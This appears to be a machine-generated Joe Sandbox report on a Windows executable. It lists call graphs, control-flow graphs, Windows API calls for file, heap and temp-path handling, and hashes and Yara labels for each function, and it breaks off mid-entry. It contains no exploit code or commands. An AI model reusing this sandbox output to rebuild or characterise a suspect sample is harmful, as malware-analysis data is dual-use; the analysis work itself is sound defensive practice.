8257->8258 8259 14001f7e0 8258->8259 8261 14000de04 8260->8261 8262 14000ddd4 WriteFile 8260->8262 8261->8246 8262->8246 8263->8247 8265 140011be7 8264->8265 8266 140011c3c 8265->8266 8267 140011c32 LeaveCriticalSection 8265->8267 8266->8247 8267->8266 8269 140011c74 HeapFree 8268->8269 8271 14001f820 8269->8271 11098 1400040ac 11099 1400123e0 21 API calls 11098->11099 11100 1400040ce 11099->11100 11101 14000d6a0 5 API calls 11100->11101 11102 1400040da 11101->11102 11111 1400121c0 GetLastError TlsGetValue SetLastError 11102->11111 11104 1400040e4 11112 1400121c0 GetLastError TlsGetValue SetLastError 11104->11112 11106 1400040f8 11107 14000ca00 4 API calls 11106->11107 11108 14000410d 11107->11108 11109 140012210 3 API calls 11108->11109 11110 140004122 11109->11110 11111->11104 11112->11106 10726 14000de50 10727 1400112a8 5 API calls 10726->10727 10728 14000de98 10727->10728 10729 14000e074 10728->10729 10730 14000deb6 10728->10730 10731 14000defb 10728->10731 10732 14000dec9 10730->10732 10733 14000decd CreateFileW 10730->10733 10734 14000df42 10731->10734 10735 14000df00 10731->10735 10732->10733 10743 14000dfb7 10733->10743 10738 14000df5f CreateFileW 10734->10738 10734->10743 10736 14000df13 10735->10736 10737 14000df17 CreateFileW 10735->10737 10736->10737 10737->10743 10741 14000df8d CreateFileW 10738->10741 10738->10743 10739 14000e04d 10739->10729 10740 1400111dc 4 API calls 10739->10740 10740->10729 10741->10743 10742 14000dff9 10742->10739 10745 14000e036 SetFilePointer 10742->10745 10743->10739 10743->10742 10744 14000dfe1 HeapAlloc 10743->10744 10744->10742 10745->10739 10943 140002853 10944 1400123e0 21 API calls 10943->10944 10945 140002861 10944->10945 10964 1400121c0 GetLastError TlsGetValue SetLastError 10945->10964 10947 14000286b 10965 1400121c0 GetLastError TlsGetValue SetLastError 10947->10965 10949 140002889 10950 140012450 4 API calls 10949->10950 10951 140002898 10950->10951 10966 1400121c0 GetLastError TlsGetValue SetLastError 10951->10966 10953 1400028a6 10967 1400121c0 GetLastError TlsGetValue SetLastError 10953->10967 10955 1400028ba 10968 14000c8e0 10955->10968 10959 1400028d4 10973 1400125d0 TlsGetValue 10959->10973 10961 1400028e5 10962 14000b574 11 API calls 10961->10962 10963 1400028fb 10962->10963 10964->10947 10965->10949 10966->10953 10967->10955 10969 14000c8f0 10968->10969 10970 1400126d0 3 API calls 10969->10970 10971 1400028ca 10970->10971 10972 140012520 TlsGetValue 10971->10972 10972->10959 10973->10961

                                      Executed Functions

                                      Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                      • String ID: GetLongPathNameW$Kernel32.DLL
                                      • API String ID: 820969696-2943376620
                                      • Opcode ID: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
                                      • Instruction ID: 230e630dded4efaa915c31c3904b5b857ecb3aa047886c8d585020238d201ac5
                                      • Opcode Fuzzy Hash: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
                                      • Instruction Fuzzy Hash: 74116D3171074086EF159F27A9443A967A5FB8CFC0F481029FF4E4B7A5DE39C4518340
                                      Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
                                      • String ID:
                                      • API String ID: 4232179356-0
                                      • Opcode ID: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
                                      • Instruction ID: 77aa1fd205ec2d48eabb088ee49ef1dd4fb6b524f1726a3c9e39dbd98a5b5f3b
                                      • Opcode Fuzzy Hash: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
                                      • Instruction Fuzzy Hash: 138162FBE69644E5EA07B763BC46BED5220D3AD3D4F504410FF08062A3EE3995EA4B10
                                      Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151filememoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 94 14000de50-14000de9e call 1400112a8 97 14000dea4-14000deb4 94->97 98 14000e098-14000e09b 94->98 100 14000deb6-14000dec7 97->100 101 14000defb-14000defe 97->101 99 14000e07f-14000e097 98->99 102 14000dec9 100->102 103 14000decd-14000def6 CreateFileW 100->103 104 14000df42-14000df46 101->104 105 14000df00-14000df11 101->105 102->103 106 14000dfbc-14000dfc0 103->106 109 14000dfb7 104->109 110 14000df48-14000df59 104->110 107 14000df13 105->107 108 14000df17-14000df40 CreateFileW 105->108 113 14000dfc6-14000dfc9 106->113 114 14000e05d-14000e06f call 1400111dc 106->114 107->108 108->106 109->106 111 14000df5b 110->111 112 14000df5f-14000df8b CreateFileW 110->112 111->112 112->113 116 14000df8d-14000dfb5 CreateFileW 112->116 113->114 117 14000dfcf-14000dfd8 113->117 118 14000e074-14000e07c 114->118 116->106 119 14000dff9 117->119 120 14000dfda-14000dfdf 117->120 118->99 122 14000dffd-14000e02d 119->122 120->119 121 14000dfe1-14000dff7 HeapAlloc 120->121 121->122 123 14000e04d-14000e05b 122->123 124 14000e02f-14000e034 122->124 123->114 123->118 124->123 125 14000e036-14000e047 SetFilePointer 124->125 125->123
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
                                      • String ID:
                                      • API String ID: 2685021396-0
                                      • Opcode ID: 90872b3e34ccf7d1475fd6165b8231d8d7d244be71cfa9b75e83e52ddb76e0bc
                                      • Instruction ID: 19dccfeb25466122eda91520b9d3e1282c027ca6efa307134c14a125255dccfb
                                      • Opcode Fuzzy Hash: 90872b3e34ccf7d1475fd6165b8231d8d7d244be71cfa9b75e83e52ddb76e0bc
                                      • Instruction Fuzzy Hash: CA51B1B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10
                                      Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 126 14000593c-14000593e 127 140005945-140005954 126->127 127->127 128 140005956-140005979 call 1400123e0 127->128 131 14000597b-140005987 128->131 132 140005a39-140005a53 131->132 133 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 131->133 135 140005a55-140005a61 132->135 133->131 133->132 137 140005b13-140005b2d 135->137 138 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 135->138 141 140005b2f-140005b3b 137->141 138->135 138->137 144 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 141->144 145 140005bed-140005c07 141->145 144->141 144->145 149 140005c09-140005c15 145->149 153 140005cc7-140005ce1 149->153 154 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 149->154 155 140005ce3-140005cef 153->155 154->149 154->153 161 140005da1-140005dbb 155->161 162 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 155->162 169 140005dbd-140005dc9 161->169 284 140005d96-140005d9b 162->284 176 140005e7f-140005e99 169->176 177 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 169->177 185 140005e9b-140005ea7 176->185 177->169 177->176 192 140005f5d-140005f77 185->192 193 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 185->193 201 140005f79-140005f85 192->201 193->185 193->192 209 14000603b-140006055 201->209 210 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 201->210 219 140006057-140006063 209->219 210->201 210->209 228 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 219->228 229 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 219->229 428 1400065a1-1400065a6 call 140003ddc 228->428 429 14000657d-14000659f call 140007284 228->429 229->219 229->228 284->155 284->161 432 1400065ab-1400066b0 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 428->432 429->432 467 1400066b5-1400067a9 call 140006a58 call 140002930 call 140012360 * 10 432->467
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
                                      • String ID:
                                      • API String ID: 2499486723-0
                                      • Opcode ID: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
                                      • Instruction ID: 8b331e692c67017886d6c7239b17c9f9d27d3c51ffaf72a1bb59c68ee6c0545e
                                      • Opcode Fuzzy Hash: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
                                      • Instruction Fuzzy Hash: 83723BB6E25548D6EA16B7B7B8877E91220A3AD394F500411FF4C0B363EE39C5F64B10
                                      Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FilePointermemmove
                                      • String ID:
                                      • API String ID: 2366752189-0
                                      • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                      • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
                                      • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
                                      • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50
                                      Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67filememoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 509 14000e3f0-14000e404 510 14000e4f3-14000e4fd 509->510 511 14000e40a-14000e40e 509->511 511->510 512 14000e414-14000e418 511->512 513 14000e483-14000e4a6 call 14000e770 512->513 514 14000e41a-14000e423 512->514 522 14000e4a8-14000e4b5 513->522 523 14000e4ee 513->523 515 14000e451-14000e45b 514->515 516 14000e425 514->516 515->515 519 14000e45d-14000e482 WriteFile 515->519 518 14000e430-14000e43a 516->518 518->518 521 14000e43c-14000e450 call 14000e620 518->521 525 14000e4c5-14000e4d6 WriteFile 522->525 526 14000e4b7-14000e4ba call 14000e620 522->526 523->510 527 14000e4dc-14000e4e8 HeapFree 525->527 530 14000e4bf-14000e4c3 526->530 527->523 530->527
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: FileWrite$FreeHeap
                                      • String ID:
                                      • API String ID: 74418370-0
                                      • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                      • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
                                      • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
                                      • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00
                                      Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 531 14000d914-14000d922 532 14000d924-14000d95a wcsncpy wcslen 531->532 533 14000d99e 531->533 534 14000d98a-14000d99c CreateDirectoryW 532->534 535 14000d95c-14000d96b 532->535 536 14000d9a0-14000d9a8 533->536 534->536 535->534 537 14000d96d-14000d97b 535->537 537->534 538 14000d97d-14000d988 537->538 538->534 538->535
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CreateDirectorywcslenwcsncpy
                                      • String ID:
                                      • API String ID: 961886536-0
                                      • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                      • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
                                      • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
                                      • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14
                                      Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 539 14000b538-14000b573 memset InitCommonControlsEx CoInitialize
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CommonControlsInitInitializememset
                                      • String ID:
                                      • API String ID: 2179856907-0
                                      • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                      • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
                                      • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
                                      • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00
                                      Function 00000001400126D0 Relevance: 3.8, APIs: 3, Instructions: 71memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 540 1400126d0-1400126f2 TlsGetValue 541 1400126f4-1400126fc 540->541 542 140012700-14001272b 540->542 541->542 543 140012772-14001277f 542->543 544 14001272d-140012770 HeapReAlloc 542->544 545 1400127d0-140012802 543->545 546 140012781-140012789 543->546 544->545 547 140012793-1400127cd HeapReAlloc 546->547 548 14001278b 546->548 547->545 548->547
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocHeap$Value
                                      • String ID:
                                      • API String ID: 3898337583-0
                                      • Opcode ID: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
                                      • Instruction ID: 7cab8ebf5e8be7cca61280ad2f22e4d1c3948fe97e6d3aaf46f0ca18481b9e55
                                      • Opcode Fuzzy Hash: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
                                      • Instruction Fuzzy Hash: E7317336609B4486DB21CB5AE49035AB7A0F7CCBE8F144216EB8D47B78DF79C691CB40
                                      Function 0000000140012210 Relevance: 3.8, APIs: 3, Instructions: 51memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: AllocHeap$Value
                                      • String ID:
                                      • API String ID: 3898337583-0
                                      • Opcode ID: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
                                      • Instruction ID: c44eb9ef2cf98d3488e4d96c7e244cbf8e5b64558ad0ce04898d2a75112beb9a
                                      • Opcode Fuzzy Hash: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
                                      • Instruction Fuzzy Hash: 1521A336609B40C6DA25CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00
                                      Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: CodeExitProcess
                                      • String ID: open
                                      • API String ID: 3861947596-2758837156
                                      • Opcode ID: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
                                      • Instruction ID: 9a8e33d82e51c75021cc1a1bc422673ad63e4121514530fd256563005765fdb1
                                      • Opcode Fuzzy Hash: 687e6c2363dd86eb31bb0a35d986b928b7956615258b23a1130e50283f5f7496
                                      • Instruction Fuzzy Hash: 6C315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40
                                      Function 0000000140001000 Relevance: 3.1, APIs: 2, Instructions: 120memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
                                        • Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B
                                        • Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E
                                        • Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
                                        • Part of subcall function 000000014000B538: InitCommonControlsEx.COMCTL32 ref: 000000014000B561
                                        • Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569
                                        • Part of subcall function 00000001400120D0: HeapAlloc.KERNEL32 ref: 0000000140012123
                                        • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD11
                                        • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CD42
                                        • Part of subcall function 000000014000CCD8: HeapAlloc.KERNEL32 ref: 000000014000CDB2
                                        • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
                                        • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
                                        • Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1
                                        • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D476
                                        • Part of subcall function 000000014000D444: HeapAlloc.KERNEL32 ref: 000000014000D491
                                        • Part of subcall function 0000000140011D30: HeapAlloc.KERNEL32 ref: 0000000140011D82
                                        • Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6
                                        • Part of subcall function 00000001400120D0: HeapReAlloc.KERNEL32 ref: 0000000140012151
                                        • Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194
                                        • Part of subcall function 000000014000C4D0: RemoveVectoredExceptionHandler.KERNEL32 ref: 000000014000C8A5
                                        • Part of subcall function 000000014000C4D0: AddVectoredExceptionHandler.KERNEL32 ref: 000000014000C8C0
                                        • Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
                                        • Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
                                        • Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1
                                        • Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
                                        • Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266
                                      • HeapDestroy.KERNEL32 ref: 000000014000124C
                                      • ExitProcess.KERNEL32 ref: 0000000140001258
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916966984.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
                                      Similarity
                                      • API ID: Heap$Alloc$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$CommonControlsDestroyExitInitInitializeProcessRemove
                                      • String ID:
                                      • API String ID: 1207063833-0
                                      • Opcode ID: 2b686c560d3d7e8cf0c1b5237d022b828fa0a0875916c3199546faae0b532a26
                                      • Instruction ID: d53a403d2731d7f4be2c1c63aa8517eaadbba994f78fcf95756ff457d5608e18
                                      • Opcode Fuzzy Hash: 2b686c560d3d7e8cf0c1b5237d022b828fa0a0875916c3199546faae0b532a26
                                      • Instruction Fuzzy Hash: 1951F6F0A11A4481FA03F7A3F8537E926159B9D7D4F808129BF1D1B2F3DD3A85558B22
                                      Function 000000014000C4D0 Relevance: 3.0, APIs: 2, Instructions: 20COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3916905702.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                      • Associated: 00000000.00000002.3916885103.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916932180.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3916946526.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
